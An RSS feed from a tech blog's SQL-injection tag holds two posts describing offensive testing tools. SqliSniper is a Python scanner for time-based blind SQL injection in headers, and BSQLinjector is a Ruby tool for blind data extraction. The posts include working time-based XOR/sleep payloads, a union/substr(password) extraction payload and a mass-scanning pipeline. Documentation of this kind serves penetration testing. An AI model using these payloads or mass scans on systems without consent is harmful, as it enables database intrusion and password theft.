<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>sql injection Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/sql-injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://kostacipo.stream/tag/sql-injection/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Wed, 21 Feb 2024 23:39:18 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>sql injection Archives - Tech Chronicles</title>
	<link>http://kostacipo.stream/tag/sql-injection/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>SqliSniper – Enhancing Web Security By Detecting SQL Injection Vulnerabilities With Python</title>
		<link>http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/</link>
					<comments>http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 23:39:18 +0000</pubDate>
				<category><![CDATA[Data]]></category>
		<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[sql injection]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2177</guid>

					<description><![CDATA[<p>SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/">SqliSniper – Enhancing Web Security By Detecting SQL Injection Vulnerabilities With Python</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>SqliSniper</strong> is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers.</p>
<p>It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency.</p>
<p>Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.</p>
<h2 class="wp-block-heading"><strong>Key Features</strong></h2>
<ul>
<li><strong>Time-Based Blind SQL Injection Detection:</strong> Pinpoints potential SQL injection vulnerabilities in HTTP headers.</li>
<li><strong>Multi-Threaded Scanning:</strong> Offers faster scanning capabilities through concurrent processing.</li>
<li><strong>Discord Notifications:</strong> Sends alerts via Discord webhook for detected vulnerabilities.</li>
<li><strong>False Positive Checks:</strong> Implements response time analysis to differentiate between true positives and false alarms.</li>
<li><strong>Custom Payload and Headers Support:</strong> Allows users to define custom payloads and headers for targeted scanning.</li>
</ul>
<h2 class="wp-block-heading"><strong>Installation</strong></h2>
<pre class="wp-block-code"><code>git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt</code></pre>
<h2 class="wp-block-heading"><strong>Usage</strong></h2>
<p>This will display help for the tool. Here are all the options it supports.</p>
<pre class="wp-block-code"><code>ubuntu:~/sqlisniper$ ./sqlisniper.py -h


███████╗ ██████╗ ██╗     ██╗    ███████╗███╗   ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║     ██║    ██╔════╝████╗  ██║██║██╔══██╗██╔════╝██╔══██╗
███████╗██║   ██║██║     ██║    ███████╗██╔██╗ ██║██║██████╔╝█████╗  ██████╔╝
╚════██║██║▄▄ ██║██║     ██║    ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝  ██╔══██╗
███████║╚██████╔╝███████╗██║    ███████║██║ ╚████║██║██║     ███████╗██║  ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝    ╚══════╝╚═╝  ╚═══╝╚═╝╚═╝     ╚══════╝╚═╝  ╚═╝

                            -: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
                     [--threads THREADS]

Detect SQL injection by sending malicious queries

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL for the target
  -r URLS_FILE, --urls_file URLS_FILE
                        File containing a list of URLs
  -p, --pipeline        Read from pipeline
  --proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        Single payload for testing
  --discord DISCORD     Discord Webhook URL
  --headers HEADERS     File containing headers (default is headers.txt)
  --threads THREADS     Number of threads</code></pre>
<h2 class="wp-block-heading"><strong>Running SqliSniper</strong></h2>
<h3 class="wp-block-heading"><strong>Single Url Scan</strong></h3>
<p>The url can be provided with <code>-u flag</code> for single site scan</p>
<pre class="wp-block-code"><code>./sqlisniper.py -u http://example.com</code></pre>
<h3 class="wp-block-heading"><strong>File Input</strong></h3>
<p>The <code>-r flag</code> allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.</p>
<pre class="wp-block-code"><code>./sqlisniper.py -r url.txt</code></pre>
<h3 class="wp-block-heading"><strong>Piping URLs</strong></h3>
<p>The SqliSniper can also worked with the pipeline input with <code>-p flag</code></p>
<pre class="wp-block-code"><code>cat url.txt | ./sqlisniper.py -p</code></pre>
<p>The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.</p>
<pre class="wp-block-code"><code>subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p</code></pre>
<h3 dir="auto" tabindex="-1">Scanning with custom payloads</h3>
<p dir="auto">By default the SqliSniper use the payloads.txt file. However <code>--payload flag</code> can be used for providing custom payloads file.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>./sqlisniper.py -u http://example.com --payload mssql_payloads.txt</code></pre>
</div>
<p dir="auto">While using the custom payloads file, ensure that you substitute the sleep time with <code>%__TIME_OUT__%</code>. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Scanning with Single Payloads</h3>
<p dir="auto">If you want to only test with the single payload <code>--single-payload flag</code> can be used. Make sure to replace the sleep time with <code>%__TIME_OUT__%</code></p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Scanning Custom Header</h3>
<p dir="auto">Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Sending Discord Alert Notifications</h3>
<p dir="auto">SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>./sqlisniper.py -r url.txt --discord &lt;web_hookurl&gt;
</code></pre>
</div>
<h3 dir="auto" tabindex="-1">Multi-Threading</h3>
<p dir="auto">Threads can be defined with <code>--threads flag</code></p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code> ./sqlisniper.py -r url.txt --threads 10
</code></pre>
<div class="zeroclipboard-container"></div>
</div>
<p dir="auto"><strong>Note:</strong> It is crucial to consider that <strong>employing a higher number of threads might lead to potential false positives or overlooking valid issues</strong>. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.</p>
<hr />
<table style="width: 99.7078%; height: 6px;">
<tbody>
<tr>
<td>
<h2 dir="auto" tabindex="-1">Legal Disclaimer</h2>
</td>
</tr>
</tbody>
</table>
<p dir="auto">Usage of this tool for attacking targets without prior mutual consent is strictly prohibited. It is the end user&#8217;s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.</p>
<p>The post <a href="http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/">SqliSniper – Enhancing Web Security By Detecting SQL Injection Vulnerabilities With Python</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/sqlisniper-enhancing-web-security-by-detecting-sql-injection-vulnerabilities-with-python/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>BSQLinjector – Blind SQL Injection Tool Download in Ruby</title>
		<link>http://kostacipo.stream/bsqlinjector-blind-sql-injection-tool-download-in-ruby/</link>
					<comments>http://kostacipo.stream/bsqlinjector-blind-sql-injection-tool-download-in-ruby/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 13 Dec 2019 13:18:46 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[sql injection]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1465</guid>

					<description><![CDATA[<p>&#160; BSQLinjector is an easy to use Blind SQL Injection tool in Ruby, that uses blind methods to retrieve data from SQL databases. The download is below. &#160; The author recommends using the “--test” switch to clearly see how configured payload looks like before sending it to an application. What is Blind SQL Injection? Blind [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/bsqlinjector-blind-sql-injection-tool-download-in-ruby/">BSQLinjector – Blind SQL Injection Tool Download in Ruby</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>BSQLinjector is an easy to use Blind SQL Injection tool in Ruby, that uses blind methods to retrieve data from SQL databases. The download is below.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter size-medium wp-image-4782" src="https://cdn.darknet.org.uk/wp-content/uploads/2017/09/BSQLinjector-Blind-SQL-Injection-Tool-Download-640x360.png" sizes="(max-width: 640px) 100vw, 640px" srcset="https://cdn.darknet.org.uk/wp-content/uploads/2017/09/BSQLinjector-Blind-SQL-Injection-Tool-Download-640x360.png 640w, https://cdn.darknet.org.uk/wp-content/uploads/2017/09/BSQLinjector-Blind-SQL-Injection-Tool-Download.png 908w" alt="BSQLinjector - Blind SQL Injection Tool Download" width="640" height="360"></p>
<p>&nbsp;</p>
<p>The author recommends using the “<code>--test</code>” switch to clearly see how configured payload looks like before sending it to an application.</p>
<h2>What is Blind SQL Injection?</h2>
<p>Blind SQL Injection is a type of SQL Injection (SQLi) attack that asks the database true or false questions and determines the answer based on the application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.</p>
<h2>Using BSQLinjector for Blind SQL Injection</h2>
<div id="crayon-5df38f50d5756696199123" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"><textarea class="crayon-plain print-no" readonly="readonly" data-settings="dblclick" wrap="soft">  &#8211;file	    Mandatory &#8211; File containing valid HTTP request and SQL injection point (SQLINJECT). (&#8211;file=/tmp/req.txt)<br />
  &#8211;pattern	    Mandatory &#8211; Pattern to look for when query is true. (&#8211;pattern=truestatement)<br />
  &#8211;prepend	    Mandatory &#8211; Main payload. (&#8211;prepend=&#8221;abcd&#8217;and&#8217;a&#8217;=&#8217;b&#8217;+union+select+&#8217;truestatement&#8217;+from+table+where+col%3d&#8217;value&#8217;+and+substr(password,&#8221;<br />
  &#8211;append	    How to end our payload. For example comment out rest of SQL statement. (&#8211;append=&#8217;#)<br />
  &#8211;schar	    Character placed around chars. This character is not used while in hex mode. (&#8211;schar=&#8221;&#8216;&#8221;)<br />
  &#8211;2ndfile	    File containing valid HTTP request used in second order exploitation. (&#8211;2ndfile=/tmp/2ndreq.txt)</p>
<p>  &#8211;mode	    Blind mode to use &#8211; (between &#8211; b (generates less requests), moreless &#8211; a (generates less requests by using &#8220;&lt;&#8220;, &#8220;&gt;&#8221;, &#8220;=&#8221; characters), like &#8211; l (complete bruteforce), equals &#8211; e (complete bruteforce)). (&#8211;mode=l)<br />
  &#8211;hex		    Use hex to compare instead of characters.<br />
  &#8211;case	    Case sensitivity.</p>
<p>  &#8211;ssl		    Use SSL.<br />
  &#8211;proxy	    Proxy to use. (&#8211;proxy=127.0.0.1:8080)</p>
<p>  &#8211;test	    Enable test mode. Do not send request, just show full payload.<br />
  &#8211;special	    Include all special characters in enumeration.<br />
  &#8211;start	    Start enumeration from specified character. (&#8211;start=10)<br />
  &#8211;max		    Maximum characters to enumerate. (&#8211;max=10)<br />
  &#8211;timeout	    Timeout in waiting for responses. (&#8211;timeout=20)<br />
  &#8211;only-final	Stop showing each enumerated letter.<br />
  &#8211;comma	    Encode comma.<br />
  &#8211;bracket	    Add brackets to the end of substring function. &#8211;bracket=&#8221;))&#8221;<br />
  &#8211;hexspace	Use space instead of brackets to split hex values.<br />
  &#8211;verbose	    Show verbose messages.</textarea></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-1">1</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-2">2</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-3">3</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-4">4</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-5">5</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-6">6</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-7">7</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-8">8</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-9">9</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-10">10</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-11">11</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-12">12</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-13">13</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-14">14</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-15">15</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-16">16</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-17">17</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-18">18</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-19">19</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-20">20</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-21">21</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-22">22</div>
<div class="crayon-num" data-line="crayon-5df38f50d5756696199123-23">23</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5df38f50d5756696199123-24">24</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5df38f50d5756696199123-1" class="crayon-line"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&#8212;</span><span class="crayon-e">file &nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">Mandatory</span> <span class="crayon-o">&#8211;</span> <span class="crayon-e">File </span><span class="crayon-e">containing </span><span class="crayon-e">valid </span><span class="crayon-e">HTTP </span><span class="crayon-e">request </span><span class="crayon-st">and</span> <span class="crayon-e">SQL </span><span class="crayon-e">injection </span><span class="crayon-e">point</span> <span class="crayon-sy">(</span><span class="crayon-v">SQLINJECT</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span> <span class="crayon-sy">(</span><span class="crayon-o">&#8212;</span><span class="crayon-v">file</span><span class="crayon-o">=</span><span class="crayon-o">/</span><span class="crayon-v">tmp</span><span class="crayon-o">/</span><span class="crayon-v">req</span><span class="crayon-sy">.</span><span class="crayon-v">txt</span><span class="crayon-sy">)</span></div>
<div id="crayon-5df38f50d5756696199123-2" class="crayon-line crayon-striped-line"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&#8212;</span><span class="crayon-e">pattern &nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">Mandatory</span> <span class="crayon-o">&#8211;</span> <span class="crayon-e">Pattern </span><span class="crayon-st">to</span> <span class="crayon-e">look </span><span class="crayon-st">for</span> <span class="crayon-e">when </span><span class="crayon-e">query </span><span class="crayon-st">is</span> <span class="crayon-t">true</span><span class="crayon-sy">.</span> <span class="crayon-sy">(</span><span class="crayon-o">&#8212;</span><span class="crayon-v">pattern</span><span class="crayon-o">=</span><span class="crayon-v">truestatement</span><span class="crayon-sy">)</span></div>
<div id="crayon-5df38f50d5756696199123-3" class="crayon-line"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&#8212;</span><span class="crayon-e">prepend &nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-v">Mandatory</span> <span class="crayon-o">&#8211;</span> <span class="crayon-e">Main </span><span class="crayon-v">payload</span><span class="crayon-sy">.</span> <span class="crayon-sy">(</span><span class="crayon-o">&#8212;</span><span class="crayon-v">prepend</span><span class="crayon-o">=</span><span class="crayon-s">&#8220;abcd&#8217;and&#8217;a&#8217;=&#8217;b&#8217;+union+select+&#8217;truestatement&#8217;+from+table+where+col%3d&#8217;value&#8217;+and+substr(password,&#8221;</span></div>
<div id="crayon-5df38f50d5756696199123-4" class="crayon-line crayon-striped-line"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&#8212;</span><span class="crayon-e">append &nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-e">How </span><span class="crayon-st">to</span> <span class="crayon-st">end</span> <span class="crayon-e">our </span><span class="crayon-v">payload</span><span class="crayon-sy">.</span> <span class="crayon-st">For</span> <span class="crayon-e">example </span><span class="crayon-e">comment </span><span class="crayon-e">out </span><span class="crayon-e">rest </span><span class="crayon-e">of </span><span class="crayon-e">SQL </span><span class="crayon-v">statement</span><span class="crayon-sy">.</span> <span class="crayon-sy">(</span><span class="crayon-o">&#8212;</span><span class="crayon-v">append</span><span class="crayon-o">=</span><span class="crayon-s">&#8216;#)</span></div>
<div id="crayon-5df38f50d5756696199123-5" class="crayon-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;schar &nbsp;&nbsp;&nbsp;&nbsp;Character placed around chars. This character is not used while in hex mode. (&#8211;schar=&#8221;&#8216;</span><span class="crayon-s">&#8220;)</span></div>
<div id="crayon-5df38f50d5756696199123-6" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;2ndfile &nbsp;&nbsp;&nbsp;&nbsp;File containing valid HTTP request used in second order exploitation. (&#8211;2ndfile=/tmp/2ndreq.txt)</span></div>
<div id="crayon-5df38f50d5756696199123-7" class="crayon-line">&nbsp;</div>
<div id="crayon-5df38f50d5756696199123-8" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;mode &nbsp;&nbsp;&nbsp;&nbsp;Blind mode to use &#8211; (between &#8211; b (generates less requests), moreless &#8211; a (generates less requests by using &#8220;</span><span class="crayon-o">&lt;</span><span class="crayon-s">&#8220;, &#8220;</span><span class="crayon-o">&gt;</span><span class="crayon-s">&#8220;, &#8220;</span><span class="crayon-o">=</span><span class="crayon-s">&#8221; characters), like &#8211; l (complete bruteforce), equals &#8211; e (complete bruteforce)). (&#8211;mode=l)</span></div>
<div id="crayon-5df38f50d5756696199123-9" class="crayon-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;hex &nbsp;&nbsp;&nbsp;&nbsp;Use hex to compare instead of characters.</span></div>
<div id="crayon-5df38f50d5756696199123-10" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;case &nbsp;&nbsp;&nbsp;&nbsp;Case sensitivity.</span></div>
<div id="crayon-5df38f50d5756696199123-11" class="crayon-line">&nbsp;</div>
<div id="crayon-5df38f50d5756696199123-12" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;ssl &nbsp;&nbsp;&nbsp;&nbsp;Use SSL.</span></div>
<div id="crayon-5df38f50d5756696199123-13" class="crayon-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;proxy &nbsp;&nbsp;&nbsp;&nbsp;Proxy to use. (&#8211;proxy=127.0.0.1:8080)</span></div>
<div id="crayon-5df38f50d5756696199123-14" class="crayon-line crayon-striped-line">&nbsp;</div>
<div id="crayon-5df38f50d5756696199123-15" class="crayon-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;test &nbsp;&nbsp;&nbsp;&nbsp;Enable test mode. Do not send request, just show full payload.</span></div>
<div id="crayon-5df38f50d5756696199123-16" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;special &nbsp;&nbsp;&nbsp;&nbsp;Include all special characters in enumeration.</span></div>
<div id="crayon-5df38f50d5756696199123-17" class="crayon-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;start &nbsp;&nbsp;&nbsp;&nbsp;Start enumeration from specified character. (&#8211;start=10)</span></div>
<div id="crayon-5df38f50d5756696199123-18" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;max &nbsp;&nbsp;&nbsp;&nbsp;Maximum characters to enumerate. (&#8211;max=10)</span></div>
<div id="crayon-5df38f50d5756696199123-19" class="crayon-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;timeout &nbsp;&nbsp;&nbsp;&nbsp;Timeout in waiting for responses. (&#8211;timeout=20)</span></div>
<div id="crayon-5df38f50d5756696199123-20" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;only-final Stop showing each enumerated letter.</span></div>
<div id="crayon-5df38f50d5756696199123-21" class="crayon-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;comma &nbsp;&nbsp;&nbsp;&nbsp;Encode comma.</span></div>
<div id="crayon-5df38f50d5756696199123-22" class="crayon-line crayon-striped-line"><span class="crayon-s">&nbsp;&nbsp;&#8211;bracket &nbsp;&nbsp;&nbsp;&nbsp;Add brackets to the end of substring function. &#8211;bracket=&#8221;</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span>&#8220;</div>
<div id="crayon-5df38f50d5756696199123-23" class="crayon-line"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&#8212;</span><span class="crayon-e">hexspace </span><span class="crayon-st">Use</span> <span class="crayon-e">space </span><span class="crayon-e">instead </span><span class="crayon-e">of </span><span class="crayon-e">brackets </span><span class="crayon-st">to</span> <span class="crayon-e">split </span><span class="crayon-e">hex </span><span class="crayon-v">values</span><span class="crayon-sy">.</span></div>
<div id="crayon-5df38f50d5756696199123-24" class="crayon-line crayon-striped-line"><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-o">&#8212;</span><span class="crayon-e">verbose &nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-e">Show </span><span class="crayon-e">verbose </span><span class="crayon-v">messages</span><span class="crayon-sy">.</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>&nbsp;</p>
<p>Example usage:</p>
<div id="crayon-5df38f50d5761260054175" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"><textarea class="crayon-plain print-no" readonly="readonly" data-settings="dblclick" wrap="soft"> ruby ./BSQLinjector.rb &#8211;pattern=truestatement &#8211;file=/tmp/req.txt &#8211;schar=&#8221;&#8216;&#8221; &#8211;prepend=&#8221;abcd&#8217;and&#8217;a&#8217;=&#8217;b&#8217;+union+select+&#8217;truestatement&#8217;+from+table+where+col%3d&#8217;value&#8217;+and+substr(password,&#8221; &#8211;append=&#8221;&#8216;#&#8221; &#8211;ssl</textarea></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="show">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5df38f50d5761260054175-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5df38f50d5761260054175-1" class="crayon-line"><span class="crayon-i">ruby</span> <span class="crayon-sy">.</span><span class="crayon-o">/</span><span class="crayon-v">BSQLinjector</span><span class="crayon-sy">.</span><span class="crayon-v">rb</span> <span class="crayon-o">&#8212;</span><span class="crayon-v">pattern</span><span class="crayon-o">=</span><span class="crayon-v">truestatement</span> <span class="crayon-o">&#8212;</span><span class="crayon-v">file</span><span class="crayon-o">=</span><span class="crayon-o">/</span><span class="crayon-v">tmp</span><span class="crayon-o">/</span><span class="crayon-v">req</span><span class="crayon-sy">.</span><span class="crayon-v">txt</span> <span class="crayon-o">&#8212;</span><span class="crayon-v">schar</span><span class="crayon-o">=</span><span class="crayon-s">&#8220;&#8216;&#8221;</span> <span class="crayon-o">&#8212;</span><span class="crayon-v">prepend</span><span class="crayon-o">=</span><span class="crayon-s">&#8220;abcd&#8217;and&#8217;a&#8217;=&#8217;b&#8217;+union+select+&#8217;truestatement&#8217;+from+table+where+col%3d&#8217;value&#8217;+and+substr(password,&#8221;</span> <span class="crayon-o">&#8212;</span><span class="crayon-v">append</span><span class="crayon-o">=</span><span class="crayon-s">&#8220;&#8216;#&#8221;</span> <span class="crayon-o">&#8212;</span><span class="crayon-v">ssl</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The most famous Blind SQL injection tool would definitely be <a href="https://www.darknet.org.uk/2007/02/sqlmap-automated-blind-sql-injection-tool/">sqlmap, which automates it</a>.</p>
<p>You can download BSQLinjector here:</p>
<p><a href="https://raw.githubusercontent.com/enjoiz/BSQLinjector/master/BSQLinjector.rb">BSQLinjector.rb</a></p>
<p>Or read more <a href="https://github.com/enjoiz/BSQLinjector">here</a>.</p>
<p>The post <a href="http://kostacipo.stream/bsqlinjector-blind-sql-injection-tool-download-in-ruby/">BSQLinjector – Blind SQL Injection Tool Download in Ruby</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/bsqlinjector-blind-sql-injection-tool-download-in-ruby/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
